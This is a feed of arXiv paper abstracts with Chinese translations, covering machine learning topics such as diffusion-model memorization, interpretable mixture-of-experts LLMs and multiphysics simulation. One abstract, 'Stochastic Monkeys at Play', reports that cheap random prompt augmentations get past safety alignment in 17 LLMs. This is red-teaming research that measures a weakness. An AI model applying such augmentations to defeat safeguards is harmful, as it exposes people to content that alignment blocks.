In this paper, we introduce a geometric framework to analyze memorization in diffusion models using the eigenvalues of the Hessian of the log probability density. We propose that memorization arises from isolated points in the learned probability distribution, characterized by sharpness in the probability landscape, as indicated by large negative eigenvalues of the Hessian. Through experiments on various datasets, we demonstrate that these eigenvalues effectively detect and quantify memorization. Our approach provides a clear understanding of memorization in diffusion models and lays the groundwork for developing strategies to ensure secure and reliable generative models
Updated: 2024-12-05 13:07:24
标题: 通过概率景观中的尖锐度理解生成模型中的记忆化
摘要: 在这篇论文中,我们引入了一个几何框架来分析扩散模型中的记忆化,使用概率密度的Hessian矩阵的特征值。我们提出,记忆化是因为学习到的概率分布中存在孤立点,这些点在概率景观中表现为尖锐,由Hessian矩阵的大负特征值表示。通过对各种数据集的实验,我们证明这些特征值能够有效地检测和量化记忆化。我们的方法为了解扩散模型中的记忆化提供了清晰的理解,并为开发确保安全可靠的生成模型的策略奠定了基础。
更新时间: 2024-12-05 13:07:24
领域: cs.LG,cs.AI
Monet: Mixture of Monosemantic Experts for Transformers
Understanding the internal computations of large language models (LLMs) is crucial for aligning them with human values and preventing undesirable behaviors like toxic content generation. However, mechanistic interpretability is hindered by polysemanticity -- where individual neurons respond to multiple, unrelated concepts. While Sparse Autoencoders (SAEs) have attempted to disentangle these features through sparse dictionary learning, they have compromised LLM performance due to reliance on post-hoc reconstruction loss. To address this issue, we introduce Mixture of Monosemantic Experts for Transformers (Monet) architecture, which incorporates sparse dictionary learning directly into end-to-end Mixture-of-Experts pretraining. Our novel expert decomposition method enables scaling the expert count to 262,144 per layer while total parameters scale proportionally to the square root of the number of experts. Our analyses demonstrate mutual exclusivity of knowledge across experts and showcase the parametric knowledge encapsulated within individual experts. Moreover, Monet allows knowledge manipulation over domains, languages, and toxicity mitigation without degrading general performance. Our pursuit of transparent LLMs highlights the potential of scaling expert counts to enhance} mechanistic interpretability and directly resect the internal knowledge to fundamentally adjust} model behavior. The source code and pretrained checkpoints are available at https://github.com/dmis-lab/Monet.
Updated: 2024-12-05 13:06:03
标题: 莫奈:变压器的单义专家混合模型
摘要: 理解大型语言模型(LLMs)的内部计算对于将它们与人类价值观对齐并防止产生有害行为,如生成有毒内容,至关重要。然而,机械可解释性受到多义性的阻碍-其中单个神经元对多个不相关的概念作出反应。虽然稀疏自动编码器(SAEs)尝试通过稀疏字典学习来解开这些特征,但由于依赖事后重构损失,它们损害了LLM的性能。为了解决这个问题,我们引入了专家混合模型转换器(Monet)架构,它将稀疏字典学习直接整合到端到端专家混合预训练中。我们的新颖专家分解方法使专家数量能够扩展到每层262,144个,而总参数随专家数量的平方根成比例地扩展。我们的分析表明,专家之间的知识是互相排斥的,并展示了各个专家内部所包含的参数化知识。此外,Monet允许在领域、语言和有害性减轻方面进行知识操作,而不会降低总体性能。我们对透明LLMs的追求突显了扩展专家数量以增强机械可解释性并直接调整内部知识以根本调整模型行为的潜力。源代码和预训练检查点可从https://github.com/dmis-lab/Monet获取。
更新时间: 2024-12-05 13:06:03
领域: cs.AI
Text Change Detection in Multilingual Documents Using Image Comparison
Document comparison typically relies on optical character recognition (OCR) as its core technology. However, OCR requires the selection of appropriate language models for each document and the performance of multilingual or hybrid models remains limited. To overcome these challenges, we propose text change detection (TCD) using an image comparison model tailored for multilingual documents. Unlike OCR-based approaches, our method employs word-level text image-to-image comparison to detect changes. Our model generates bidirectional change segmentation maps between the source and target documents. To enhance performance without requiring explicit text alignment or scaling preprocessing, we employ correlations among multi-scale attention features. We also construct a benchmark dataset comprising actual printed and scanned word pairs in various languages to evaluate our model. We validate our approach using our benchmark dataset and public benchmarks Distorted Document Images and the LRDE Document Binarization Dataset. We compare our model against state-of-the-art semantic segmentation and change detection models, as well as to conventional OCR-based models.
Updated: 2024-12-05 13:04:10
标题: 多语言文档中的文本变化检测:利用图像比较
摘要: 文件比较通常依赖光学字符识别(OCR)作为其核心技术。然而,OCR需要为每个文件选择适当的语言模型,多语言或混合模型的性能仍然有限。为了克服这些挑战,我们提出使用专为多语言文件定制的图像比较模型进行文本变更检测(TCD)。与基于OCR的方法不同,我们的方法采用单词级文本图像对图像比较来检测变化。我们的模型生成源文件和目标文件之间的双向变更分割图。为了增强性能,我们利用多尺度注意力特征之间的相关性,而无需显式文本对齐或缩放预处理。我们还构建了一个基准数据集,其中包含各种语言中的实际打印和扫描的单词对,以评估我们的模型。我们使用我们的基准数据集和公共基准Distorted Document Images和LRDE Document Binarization Dataset验证我们的方法。我们将我们的模型与最先进的语义分割和变更检测模型以及传统的基于OCR的模型进行比较。
更新时间: 2024-12-05 13:04:10
领域: cs.CV,cs.AI,cs.CL,cs.LG
Marrying Causal Representation Learning with Dynamical Systems for Science
Causal representation learning promises to extend causal models to hidden causal variables from raw entangled measurements. However, most progress has focused on proving identifiability results in different settings, and we are not aware of any successful real-world application. At the same time, the field of dynamical systems benefited from deep learning and scaled to countless applications but does not allow parameter identification. In this paper, we draw a clear connection between the two and their key assumptions, allowing us to apply identifiable methods developed in causal representation learning to dynamical systems. At the same time, we can leverage scalable differentiable solvers developed for differential equations to build models that are both identifiable and practical. Overall, we learn explicitly controllable models that isolate the trajectory-specific parameters for further downstream tasks such as out-of-distribution classification or treatment effect estimation. We experiment with a wind simulator with partially known factors of variation. We also apply the resulting model to real-world climate data and successfully answer downstream causal questions in line with existing literature on climate change.
Updated: 2024-12-05 13:03:55
标题: 将因果关系表示学习与动力系统结合在一起用于科学领域
摘要: 因果表示学习承诺将因果模型扩展到从原始纠缠测量中隐藏的因果变量。然而,大多数进展集中在不同环境中证明可辨识性结果上,我们不知道任何成功的实际应用。与此同时,动力系统领域从深度学习中受益,并扩展到无数应用,但不允许参数识别。在本文中,我们建立了两者之间以及它们的关键假设之间的明确联系,使我们能够将因果表示学习中开发的可识别方法应用于动力系统。同时,我们可以利用为微分方程开发的可扩展可微求解器构建既可识别又实用的模型。总的来说,我们学习明确可控的模型,分离出轨迹特定的参数,以进一步进行下游任务,比如超出分布分类或治疗效果估计。我们在具有部分已知变化因素的风模拟器上进行实验。我们还将得到的模型应用于真实世界气候数据,并成功回答了与气候变化现有文献一致的下游因果问题。
更新时间: 2024-12-05 13:03:55
领域: cs.LG,stat.ML
Stochastic Monkeys at Play: Random Augmentations Cheaply Break LLM Safety Alignment
Safety alignment of Large Language Models (LLMs) has recently become a critical objective of model developers. In response, a growing body of work has been investigating how safety alignment can be bypassed through various jailbreaking methods, such as adversarial attacks. However, these jailbreak methods can be rather costly or involve a non-trivial amount of creativity and effort, introducing the assumption that malicious users are high-resource or sophisticated. In this paper, we study how simple random augmentations to the input prompt affect safety alignment effectiveness in state-of-the-art LLMs, such as Llama 3 and Qwen 2. We perform an in-depth evaluation of 17 different models and investigate the intersection of safety under random augmentations with multiple dimensions: augmentation type, model size, quantization, fine-tuning-based defenses, and decoding strategies (e.g., sampling temperature). We show that low-resource and unsophisticated attackers, i.e. $\textit{stochastic monkeys}$, can significantly improve their chances of bypassing alignment with just 25 random augmentations per prompt. Source code and data: https://github.com/uiuc-focal-lab/stochastic-monkeys/
Updated: 2024-12-05 12:58:44
标题: 玩耍的随机猴子:随机增强廉价打破LLM的安全对齐
摘要: 最近,大型语言模型(LLMs)的安全对齐已成为模型开发者的重要目标。作为回应,越来越多的研究致力于通过各种越狱方法,如对抗性攻击,来绕过安全对齐。然而,这些越狱方法可能成本高昂,或涉及相当数量的创造力和努力,这就引入了一个假设,即恶意用户具有高资源或复杂性。在本文中,我们研究了对输入提示进行简单随机增强如何影响最先进的LLMs,如Llama 3和Qwen 2在安全对齐有效性方面。我们对17种不同模型进行了深入评估,并研究了在多个维度下随机增强对安全性的影响:增强类型、模型大小、量化、基于微调的防御措施和解码策略(例如,采样温度)。我们展示了低资源和不复杂的攻击者,即“随机猴子”,只需每个提示进行25次随机增强就能显著提高绕过对齐的机会。源代码和数据:https://github.com/uiuc-focal-lab/stochastic-monkeys/
更新时间: 2024-12-05 12:58:44
领域: cs.LG,cs.AI
Compositional Generative Multiphysics and Multi-component Simulation
Multiphysics simulation, which models the interactions between multiple physical processes, and multi-component simulation of complex structures are critical in fields like nuclear and aerospace engineering. Previous studies often rely on numerical solvers or machine learning-based surrogate models to solve or accelerate these simulations. However, multiphysics simulations typically require integrating multiple specialized solvers-each responsible for evolving a specific physical process-into a coupled program, which introduces significant development challenges. Furthermore, no universal algorithm exists for multi-component simulations, which adds to the complexity. Here we propose compositional Multiphysics and Multi-component Simulation with Diffusion models (MultiSimDiff) to overcome these challenges. During diffusion-based training, MultiSimDiff learns energy functions modeling the conditional probability of one physical process/component conditioned on other processes/components. In inference, MultiSimDiff generates coupled multiphysics solutions and multi-component structures by sampling from the joint probability distribution, achieved by composing the learned energy functions in a structured way. We test our method in three tasks. In the reaction-diffusion and nuclear thermal coupling problems, MultiSimDiff successfully predicts the coupling solution using decoupled data, while the surrogate model fails in the more complex second problem. For the thermal and mechanical analysis of the prismatic fuel element, MultiSimDiff trained for single component prediction accurately predicts a larger structure with 64 components, reducing the relative error by 40.3% compared to the surrogate model.
Updated: 2024-12-05 12:58:30
标题: 组合式生成多物理和多组分模拟
摘要: 多物理模拟模拟了多个物理过程之间的相互作用,复杂结构的多组分模拟在核能和航空航天工程等领域至关重要。先前的研究通常依赖于数值求解器或基于机器学习的替代模型来解决或加速这些模拟。然而,多物理模拟通常需要将多个专门求解器集成到一个耦合程序中,每个求解器负责演变特定的物理过程,这带来了重大的开发挑战。此外,多组分模拟没有普遍的算法,增加了复杂性。在这里,我们提出了用扩散模型进行组成式多物理和多组分模拟(MultiSimDiff)来克服这些挑战。在基于扩散的训练过程中,MultiSimDiff学习了建模条件概率的能量函数,该概率表示一个物理过程/组分在其他过程/组分的条件下。在推理过程中,MultiSimDiff通过以结构化方式组合学习到的能量函数,从联合概率分布中进行采样生成耦合多物理解决方案和多组分结构。我们在三个任务中测试了我们的方法。在反应扩散和核热耦合问题中,MultiSimDiff成功预测了使用解耦数据的耦合解决方案,而替代模型在更复杂的第二个问题中失败。对于柱形燃料元件的热力学和力学分析,MultiSimDiff训练用于单个组分预测准确预测了具有64个组分的较大结构,相对误差比替代模型减少了40.3%。
更新时间: 2024-12-05 12:58:30
领域: cs.LG
Lexicalization Is All You Need: Examining the Impact of Lexical Knowledge in a Compositional QALD System
In this paper, we examine the impact of lexicalization on Question Answering over Linked Data (QALD). It is well known that one of the key challenges in interpreting natural language questions with respect to SPARQL lies in bridging the lexical gap, that is mapping the words in the query to the correct vocabulary elements. We argue in this paper that lexicalization, that is explicit knowledge about the potential interpretations of a word with respect to the given vocabulary, significantly eases the task and increases the performance of QA systems. Towards this goal, we present a compositional QA system that can leverage explicit lexical knowledge in a compositional manner to infer the meaning of a question in terms of a SPARQL query. We show that such a system, given lexical knowledge, has a performance well beyond current QA systems, achieving up to a $35.8\%$ increase in the micro $F_1$ score compared to the best QA system on QALD-9. This shows the importance and potential of including explicit lexical knowledge. In contrast, we show that LLMs have limited abilities to exploit lexical knowledge, with only marginal improvements compared to a version without lexical knowledge. This shows that LLMs have no ability to compositionally interpret a question on the basis of the meaning of its parts, a key feature of compositional approaches. Taken together, our work shows new avenues for QALD research, emphasizing the importance of lexicalization and compositionality.
Updated: 2024-12-05 12:56:40
标题: 词汇化是你所需要的一切:考察词汇知识在组合式QALD系统中的影响
摘要: 在这篇论文中,我们研究了词汇化对链接数据问答(QALD)的影响。众所周知,在解释自然语言问题与SPARQL相关时的关键挑战之一在于弥合词汇差距,即将查询中的单词映射到正确的词汇元素。我们在本文中认为,词汇化,即关于单词可能解释与给定词汇相关的明确知识,显著简化了任务并提高了问答系统的性能。为实现这一目标,我们提出了一个可以以组合方式利用明确的词汇知识以推断问题的含义并生成一个SPARQL查询的组合式问答系统。我们展示了这样一个系统,在具有词汇知识的情况下,其性能远远超过当前的问答系统,在QALD-9数据集上的最佳问答系统相比,微型F1分数增加了高达35.8%。这表明了包含明确词汇知识的重要性和潜力。相反,我们发现LLM在利用词汇知识方面的能力有限,仅较没有词汇知识的版本略有改善。这表明LLM无法根据其部分的含义以组合方式解释问题,这是组合方法的一个关键特征。综上所述,我们的研究为QALD研究开辟了新的途径,强调了词汇化和组合性的重要性。
更新时间: 2024-12-05 12:56:40
领域: cs.AI,cs.CL,cs.IR
SRAM-Based PUF Reliability Prediction Using Cell-Imbalance Characterization in the State Space Diagram
This work proposes a methodology to estimate the statistical distribution of the probability that a 6T bit-cell starts up to a given logic value in SRAM memories for PUF applications. First, the distribution is obtained experimentally in a 65-nm CMOS device. As this distribution cannot be reproduced by electrical simulation, we explore the use of an alternative parameter defined as the distance between the origin and the separatrix in the bit-cell state space to quantify the mismatch of the cell. The resulting distribution of this parameter obtained from Monte Carlo simulations is then related to the start-up probability distribution using a two-component logistic function. The reported results show that the proposed imbalance factor is a good predictor for PUF-related reliability estimation with the advantage that can be applied at the early design stages.
Updated: 2024-12-05 12:49:22
标题: 基于SRAM的PUF可靠性预测:利用状态空间图中的单元不平衡特征进行特征化
摘要: 这项工作提出了一种方法,用于估计在用于PUF应用的SRAM存储器中,6T比特单元启动到给定逻辑值的概率的统计分布。首先,在65纳米CMOS器件中通过实验获得了该分布。由于这种分布无法通过电气仿真重现,我们探索了一个替代参数的使用,该参数定义为比特单元状态空间中原点与分离轨道之间的距离,用于量化单元的不匹配性。从蒙特卡罗模拟中获得的这个参数的分布随后与启动概率分布相关联,使用双组分Logistic函数。报告的结果表明,所提出的不平衡因子是PUF相关可靠性估计的良好预测因子,并具有可以在早期设计阶段应用的优势。
更新时间: 2024-12-05 12:49:22
领域: cs.CR
DeepFEA: Deep Learning for Prediction of Transient Finite Element Analysis Solutions
Finite Element Analysis (FEA) is a powerful but computationally intensive method for simulating physical phenomena. Recent advancements in machine learning have led to surrogate models capable of accelerating FEA. Yet there are still limitations in developing surrogates of transient FEA models that can simultaneously predict the solutions for both nodes and elements with applicability on both the 2D and 3D domains. Motivated by this research gap, this study proposes DeepFEA, a deep learning-based framework that leverages a multilayer Convolutional Long Short-Term Memory (ConvLSTM) network branching into two parallel convolutional neural networks to predict the solutions for both nodes and elements of FEA models. The proposed network is optimized using a novel adaptive learning algorithm, called Node-Element Loss Optimization (NELO). NELO minimizes the error occurring at both branches of the network enabling the prediction of solutions for transient FEA simulations. The experimental evaluation of DeepFEA is performed on three datasets in the context of structural mechanics, generated to serve as publicly available reference datasets. The results show that DeepFEA can achieve less than 3% normalized mean and root mean squared error for 2D and 3D simulation scenarios, and inference times that are two orders of magnitude faster than FEA. In contrast, relevant state-of-the-art methods face challenges with multi-dimensional output and dynamic input prediction. Furthermore, DeepFEA's robustness was demonstrated in a real-life biomedical scenario, confirming its suitability for accurate and efficient predictions of FEA simulations.
Updated: 2024-12-05 12:46:18
标题: DeepFEA:用于预测瞬态有限元分析解的深度学习
摘要: 有限元分析(FEA)是一种用于模拟物理现象的强大但计算密集的方法。最近机器学习的进展导致了能够加速FEA的替代模型。然而,在开发能够同时预测2D和3D领域上节点和元素解决方案的瞬态FEA模型的替代品方面仍存在一些限制。受到这一研究空白的激励,本研究提出了DeepFEA,这是一个基于深度学习的框架,利用多层卷积长短期记忆(ConvLSTM)网络分支成两个平行的卷积神经网络来预测FEA模型的节点和元素的解决方案。所提出的网络使用一种新颖的自适应学习算法进行优化,称为节点-元素损失优化(NELO)。NELO最小化了网络两个分支发生的错误,从而使其能够预测瞬态FEA模拟的解决方案。DeepFEA的实验评估在结构力学背景下的三个数据集上进行,这些数据集生成用作公开可用的参考数据集。结果显示,DeepFEA可以在2D和3D模拟场景下实现不到3%的归一化均方根误差和均方根误差,并且推理时间比FEA快两个数量级。相比之下,相关的最新方法在多维输出和动态输入预测方面面临挑战。此外,DeepFEA的稳健性在一个真实的生物医学场景中得到了证实,证实了其适用于准确和高效地预测FEA模拟的能力。
更新时间: 2024-12-05 12:46:18
领域: cs.LG,cs.AI,cs.CE
Group Distributionally Robust Optimization can Suppress Class Imbalance Effect in Network Traffic Classification
Internet services have led to the eruption of network traffic, and machine learning on these Internet data has become an indispensable tool, especially when the application is risk-sensitive. This paper focuses on network traffic classification in the presence of class imbalance, which fundamentally and ubiquitously exists in Internet data analysis. This existence of class imbalance mostly drifts the optimal decision boundary, resulting in a less optimal solution for machine learning models. To alleviate the effect, we propose to design strategies for alleviating the class imbalance through the lens of group distributionally robust optimization. Our approach iteratively updates the non-parametric weights for separate classes and optimizes the learning model by minimizing reweighted losses. We interpret the optimization process from a Stackelberg game and perform extensive experiments on typical benchmarks. Results show that our approach can not only suppress the negative effect of class imbalance but also improve the comprehensive performance in prediction.
Updated: 2024-12-05 12:45:09
标题: 群组分布鲁棒优化可以抑制网络流量分类中的类别不平衡效应
摘要: 互联网服务导致网络流量的激增,对这些互联网数据进行机器学习已成为一种不可或缺的工具,特别是在应用程序对风险敏感的情况下。本文关注在存在类别不平衡的情况下进行网络流量分类,这在互联网数据分析中基本而普遍存在。类别不平衡的存在主要会导致最优决策边界的漂移,从而导致机器学习模型得到不太优化的解决方案。为了减轻这种影响,我们提出通过群体分布鲁棒优化的视角设计减轻类别不平衡的策略。我们的方法通过迭代更新各个类别的非参数权重,并通过最小化重新加权损失来优化学习模型。我们从斯塔克伯格博弈的角度解释优化过程,并在典型基准上进行了大量实验。结果显示,我们的方法不仅可以抑制类别不平衡的负面影响,还可以提高预测的综合性能。
更新时间: 2024-12-05 12:45:09
领域: stat.ML,cs.LG
Efficiently Learning at Test-Time: Active Fine-Tuning of LLMs
Recent efforts in fine-tuning language models often rely on automatic data selection, commonly using Nearest Neighbors retrieval from large datasets. However, we theoretically show that this approach tends to select redundant data, limiting its effectiveness or even hurting performance. To address this, we introduce SIFT, a data selection algorithm designed to reduce uncertainty about the model's response given a prompt, which unifies ideas from retrieval and active learning. Whereas Nearest Neighbor retrieval typically fails in the presence of information duplication, SIFT accounts for information duplication and optimizes the overall information gain of the selected examples. We focus our evaluations on fine-tuning at test-time for prompt-specific language modeling on the Pile dataset, and show that SIFT consistently outperforms Nearest Neighbor retrieval, with minimal computational overhead. Moreover, we show that our uncertainty estimates can predict the performance gain of test-time fine-tuning, and use this to develop an adaptive algorithm that invests test-time compute proportional to realized performance gains. We provide the $\texttt{activeft}$ (Active Fine-Tuning) library which can be used as a drop-in replacement for Nearest Neighbor retrieval.
Updated: 2024-12-05 12:40:16
标题: 高效学习测试时:主动微调LLM
摘要: 最近在微调语言模型方面的努力通常依赖于自动数据选择,常用的方法是从大型数据集中使用最近邻检索。然而,我们在理论上表明,这种方法往往会选择冗余数据,限制其有效性甚至损害性能。为了解决这个问题,我们引入了SIFT,这是一种旨在减少模型对提示的响应不确定性的数据选择算法,它将检索和主动学习的思想统一起来。虽然最近邻检索在存在信息重复的情况下通常会失败,但SIFT考虑了信息重复并优化了所选示例的整体信息增益。我们将重点放在Pile数据集上针对测试时微调特定提示的语言建模,并展示SIFT始终优于最近邻检索,而且计算开销很小。此外,我们展示了我们的不确定性估计可以预测测试时微调的性能增益,并利用这一点开发了一种自适应算法,根据实现的性能增益来投入测试时计算。我们提供了$\texttt{activeft}$(主动微调)库,可以用作最近邻检索的替代品。
更新时间: 2024-12-05 12:40:16
领域: cs.LG,cs.AI
Memory-efficient Continual Learning with Neural Collapse Contrastive
Contrastive learning has significantly improved representation quality, enhancing knowledge transfer across tasks in continual learning (CL). However, catastrophic forgetting remains a key challenge, as contrastive based methods primarily focus on "soft relationships" or "softness" between samples, which shift with changing data distributions and lead to representation overlap across tasks. Recently, the newly identified Neural Collapse phenomenon has shown promise in CL by focusing on "hard relationships" or "hardness" between samples and fixed prototypes. However, this approach overlooks "softness", crucial for capturing intra-class variability, and this rigid focus can also pull old class representations toward current ones, increasing forgetting. Building on these insights, we propose Focal Neural Collapse Contrastive (FNC2), a novel representation learning loss that effectively balances both soft and hard relationships. Additionally, we introduce the Hardness-Softness Distillation (HSD) loss to progressively preserve the knowledge gained from these relationships across tasks. Our method outperforms state-of-the-art approaches, particularly in minimizing memory reliance. Remarkably, even without the use of memory, our approach rivals rehearsal-based methods, offering a compelling solution for data privacy concerns.
Updated: 2024-12-05 12:38:58
标题: 具有神经坍塌对比的内存高效持续学习
摘要: 对比学习显著提高了表示质量,在继续学习中增强了跨任务的知识转移。然而,灾难性遗忘仍然是一个关键挑战,因为基于对比的方法主要关注样本之间的“软关系”或“软性”,随着数据分布的变化而变化,并导致任务之间的表示重叠。最近,新发现的神经坍塌现象在继续学习中表现出了潜力,它专注于样本之间的“硬关系”或“硬度”以及固定的原型。然而,这种方法忽视了“软性”,这对于捕捉类内变异性至关重要,而这种刚性的关注也可能将旧类别的表示拉向当前类别,增加遗忘。建立在这些见解的基础上,我们提出了Focal Neural Collapse Contrastive(FNC2),这是一种有效平衡软关系和硬关系的新型表示学习损失。此外,我们引入了Hardness-Softness Distillation(HSD)损失,逐步保留跨任务获取的知识。我们的方法胜过了最先进的方法,特别是在最小化对内存的依赖方面表现出色。值得注意的是,即使没有使用内存,我们的方法也可以与基于重演的方法匹敌,为数据隐私问题提供了一个引人注目的解决方案。
更新时间: 2024-12-05 12:38:58
领域: cs.CV,cs.AI,cs.LG
Thermal and RGB Images Work Better Together in Wind Turbine Damage Detection
The inspection of wind turbine blades (WTBs) is crucial for ensuring their structural integrity and operational efficiency. Traditional inspection methods can be dangerous and inefficient, prompting the use of unmanned aerial vehicles (UAVs) that access hard-to-reach areas and capture high-resolution imagery. In this study, we address the challenge of enhancing defect detection on WTBs by integrating thermal and RGB images obtained from UAVs. We propose a multispectral image composition method that combines thermal and RGB imagery through spatial coordinate transformation, key point detection, binary descriptor creation, and weighted image overlay. Using a benchmark dataset of WTB images annotated for defects, we evaluated several state-of-the-art object detection models. Our results show that composite images significantly improve defect detection efficiency. Specifically, the YOLOv8 model's accuracy increased from 91% to 95%, precision from 89% to 94%, recall from 85% to 92%, and F1-score from 87% to 93%. The number of false positives decreased from 6 to 3, and missed defects reduced from 5 to 2. These findings demonstrate that integrating thermal and RGB imagery enhances defect detection on WTBs, contributing to improved maintenance and reliability.
Updated: 2024-12-05 12:32:45
标题: 热像和RGB图像在风力发电机损坏检测中更好地配合使用
摘要: 风力发电机叶片(WTBs)的检测对于确保其结构完整性和运行效率至关重要。传统的检测方法可能存在危险并且效率低下,这促使使用无人机(UAVs)访问难以到达的区域并捕获高分辨率图像。在这项研究中,我们通过整合从无人机获取的热像和RGB图像来解决提高WTBs上缺陷检测的挑战。我们提出了一种多光谱图像合成方法,通过空间坐标转换、关键点检测、二进制描述符创建和加权图像叠加来结合热像和RGB图像。使用一个标记有缺陷的WTB图像的基准数据集,我们评估了多个最先进的目标检测模型。我们的结果表明,复合图像显著提高了缺陷检测效率。具体而言,YOLOv8模型的准确率从91%提高到95%,精确度从89%提高到94%,召回率从85%提高到92%,F1分数从87%提高到93%。假阳性数量从6个减少到3个,漏检缺陷数量从5个减少到2个。这些发现表明,整合热像和RGB图像提高了WTBs上的缺陷检测,有助于提高维护和可靠性。
更新时间: 2024-12-05 12:32:45
领域: cs.CV,cs.AI,cs.RO,I.4.8; I.4.6; I.2.10; I.2.9
Enhancing Mathematical Reasoning in LLMs with Background Operators
We propose utilizing background operators for mathematical reasoning in large language models (LLMs). To achieve this, we define a set of fundamental mathematical predicates as the basic building blocks. For each mathematical problem, we develop a Prolog solution that includes problem-specific predicates and intermediate predicates derived from these background operators, ensuring that each solution adheres to the defined operator set. We introduce the MATH-Prolog corpus, which is derived from the counting and probability categories of the MATH corpus. For efficient data augmentation, we apply K-fold cross-validated self-training. This method incrementally generates new Prolog solutions for each fold, incorporating those verified as correct into the training set throughout the model training process. Our experimental results demonstrate that 5-fold crossvalidated self-training effectively identifies new, accurate Prolog solutions, achieving an accuracy of 84.6% on the cross-validated set, and 84.8% on the test set during fine-tuning the Meta-Llama-3.1-8B-Instruct model. This approach successfully uncovers new solutions with fully computable inference steps for previously unseen problems. Additionally, incorporating the background mathematical predicates into the prompt enhances solution coverage.
Updated: 2024-12-05 12:24:54
标题: 使用背景运算符增强LLMs中的数学推理
摘要: 我们提议在大型语言模型(LLMs)中利用背景运算符进行数学推理。为实现这一目标,我们定义了一组基本的数学谓词作为基本构建模块。对于每个数学问题,我们开发一个Prolog解决方案,其中包括特定问题的谓词和从这些背景运算符衍生出的中间谓词,确保每个解决方案都遵循定义的运算符集。我们介绍了MATH-Prolog语料库,该语料库源自MATH语料库的计数和概率类别。为了进行高效的数据增强,我们应用了K折交叉验证的自训练方法。该方法逐步为每个折叠生成新的Prolog解决方案,并在模型训练过程中将那些经过验证为正确的解决方案整合到训练集中。我们的实验结果表明,5折交叉验证的自训练有效地识别出新的准确的Prolog解决方案,在交叉验证集上实现了84.6%的准确率,在对Meta-Llama-3.1-8B-Instruct模型进行微调时,在测试集上实现了84.8%的准确率。这种方法成功地揭示了先前未见问题的全可计算推理步骤的新解决方案。此外,将背景数学谓词纳入提示中可以增强解决方案的覆盖范围。
更新时间: 2024-12-05 12:24:54
领域: cs.AI
Pre-train, Align, and Disentangle: Empowering Sequential Recommendation with Large Language Models
Sequential recommendation (SR) aims to model the sequential dependencies in users' historical interactions to better capture their evolving interests. However, existing SR approaches primarily rely on collaborative data, which leads to limitations such as the cold-start problem and sub-optimal performance. Meanwhile, despite the success of large language models (LLMs), their application in industrial recommender systems is hindered by high inference latency, inability to capture all distribution statistics, and catastrophic forgetting. To this end, we propose a novel Pre-train, Align, and Disentangle (PAD) paradigm to empower recommendation models with LLMs. Specifically, we first pre-train both the SR and LLM models to get collaborative and textual embeddings. Next, a characteristic recommendation-anchored alignment loss is proposed using multi-kernel maximum mean discrepancy with Gaussian kernels. Finally, a triple-experts architecture, consisting aligned and modality-specific experts with disentangled embeddings, is fine-tuned in a frequency-aware manner. Experiments conducted on three public datasets demonstrate the effectiveness of PAD, showing significant improvements and compatibility with various SR backbone models, especially on cold items. The implementation code and datasets will be publicly available.
Updated: 2024-12-05 12:17:56
标题: 预训练、对齐和解耦:利用大型语言模型增强顺序推荐
摘要: Sequential recommendation (SR)旨在建模用户历史互动中的顺序依赖关系,以更好地捕捉他们不断发展的兴趣。然而,现有的SR方法主要依赖协同数据,这导致了诸如冷启动问题和次优性能等限制。同时,尽管大型语言模型(LLMs)取得了成功,但它们在工业推荐系统中的应用受到推理延迟高、无法捕捉所有分布统计信息和灾难性遗忘的阻碍。因此,我们提出了一种新颖的预训练、对齐和解缠(PAD)范式,以赋予推荐模型LLMs的能力。具体而言,我们首先对SR和LLM模型进行预训练,以获得协同和文本嵌入。接下来,提出了一种特征推荐锚点对齐损失,使用带有高斯核的多核最大均值差异。最后,在频率感知方式下对一个三重专家架构进行微调,该架构包括对齐和特定模态的专家,并具有解缠嵌入。在三个公共数据集上进行的实验表明PAD的有效性,显示出显著的改进,并与各种SR基础模型兼容,尤其是在冷启动项目上。实现代码和数据集将公开提供。
更新时间: 2024-12-05 12:17:56
领域: cs.IR,cs.AI
Missing Melodies: AI Music Generation and its "Nearly" Complete Omission of the Global South
Recent advances in generative AI have sparked renewed interest and expanded possibilities for music generation. However, the performance and versatility of these systems across musical genres are heavily influenced by the availability of training data. We conducted an extensive analysis of over one million hours of audio datasets used in AI music generation research and manually reviewed more than 200 papers from eleven prominent AI and music conferences and organizations (AAAI, ACM, EUSIPCO, EURASIP, ICASSP, ICML, IJCAI, ISMIR, NeurIPS, NIME, SMC) to identify a critical gap in the fair representation and inclusion of the musical genres of the Global South in AI research. Our findings reveal a stark imbalance: approximately 86% of the total dataset hours and over 93% of researchers focus primarily on music from the Global North. However, around 40% of these datasets include some form of non-Western music, genres from the Global South account for only 14.6% of the data. Furthermore, approximately 51% of the papers surveyed concentrate on symbolic music generation, a method that often fails to capture the cultural nuances inherent in music from regions such as South Asia, the Middle East, and Africa. As AI increasingly shapes the creation and dissemination of music, the significant underrepresentation of music genres in datasets and research presents a serious threat to global musical diversity. We also propose some important steps to mitigate these risks and foster a more inclusive future for AI-driven music generation.
Updated: 2024-12-05 12:10:42
标题: 缺失的旋律:人工智能音乐生成及其对全球南方的“几乎”完全忽视
摘要: 最近,生成式人工智能的进展引发了对音乐生成的新兴兴趣和扩展可能性。然而,这些系统在不同音乐流派中的性能和多样性受到训练数据的影响。我们对在AI音乐生成研究中使用的超过一百万小时音频数据集进行了广泛分析,并手动审查了来自十一个知名AI和音乐会议和组织(AAAI,ACM,EUSIPCO,EURASIP,ICASSP,ICML,IJCAI,ISMIR,NeurIPS,NIME,SMC)的200多篇论文,以确定AI研究中全球南方音乐流派在公平代表和包容方面存在关键差距。我们的研究结果揭示了一个鲜明的不平衡:大约86%的总数据集时长和超过93%的研究人员主要关注来自全球北方的音乐。然而,虽然大约40%的数据集包含某种形式的非西方音乐,但全球南方音乐流派仅占数据的14.6%。此外,大约51%的论文集中讨论符号音乐生成,这种方法通常无法捕捉来自南亚、中东和非洲等地区音乐中固有的文化细微差别。随着人工智能越来越多地塑造音乐的创作和传播,数据集和研究中音乐流派的显著代表不足对全球音乐多样性构成严重威胁。我们还提出了一些重要步骤,以减轻这些风险,促进AI驱动音乐生成的更加包容的未来。
更新时间: 2024-12-05 12:10:42
领域: cs.SD,cs.AI,cs.CL,cs.LG,eess.AS
D-LORD for Motion Stylization
This paper introduces a novel framework named D-LORD (Double Latent Optimization for Representation Disentanglement), which is designed for motion stylization (motion style transfer and motion retargeting). The primary objective of this framework is to separate the class and content information from a given motion sequence using a data-driven latent optimization approach. Here, class refers to person-specific style, such as a particular emotion or an individual's identity, while content relates to the style-agnostic aspect of an action, such as walking or jumping, as universally understood concepts. The key advantage of D-LORD is its ability to perform style transfer without needing paired motion data. Instead, it utilizes class and content labels during the latent optimization process. By disentangling the representation, the framework enables the transformation of one motion sequences style to another's style using Adaptive Instance Normalization. The proposed D-LORD framework is designed with a focus on 